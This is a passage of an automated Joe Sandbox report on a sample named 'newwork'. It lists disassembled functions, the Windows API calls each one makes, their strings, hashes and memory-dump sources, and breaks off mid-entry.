                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu
                                                                                • String ID:
                                                                                • API String ID: 3711407533-0
                                                                                • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                APIs
                                                                                • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Color$CallMessageProcSendTextWindow
                                                                                • String ID:
                                                                                • API String ID: 601730667-0
                                                                                • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042311E
                                                                                • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDeviceEnumFontsRelease
                                                                                • String ID:
                                                                                • API String ID: 2698912916-0
                                                                                • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 730355536-0
                                                                                • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                APIs
                                                                                  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                Strings
                                                                                • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                • NumRecs range exceeded, xrefs: 0045C396
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$BuffersFlush
                                                                                • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                • API String ID: 3593489403-659731555
                                                                                • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                APIs
                                                                                  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                  • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                  • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                  • Part of subcall function 004063C4: 6FCB1CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                  • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                  • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                  • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                  • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                  • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                  • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                  • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                  • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                  • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                  • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                  • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                  • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                  • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                  • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                  • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                  • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                  • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                  • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                • String ID: Setup
                                                                                • API String ID: 504348408-3839654196
                                                                                • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: $=H
                                                                                • API String ID: 3660427363-3538597426
                                                                                • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003
                                                                                • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                APIs
                                                                                  • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                  • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                  • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                  • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                  • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                  • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                • API String ID: 3869789854-2936008475
                                                                                • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: RegisteredOrganization$RegisteredOwner
                                                                                • API String ID: 3535843008-1113070880
                                                                                • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorFileHandleLast
                                                                                • String ID: CreateFile
                                                                                • API String ID: 2528220319-823142352
                                                                                • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                • API String ID: 71445658-2565060666
                                                                                • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                APIs
                                                                                  • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                • API String ID: 2906209438-2320870614
                                                                                • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                APIs
                                                                                  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorLibraryLoadModeProc
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2492108670-2683653824
                                                                                • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
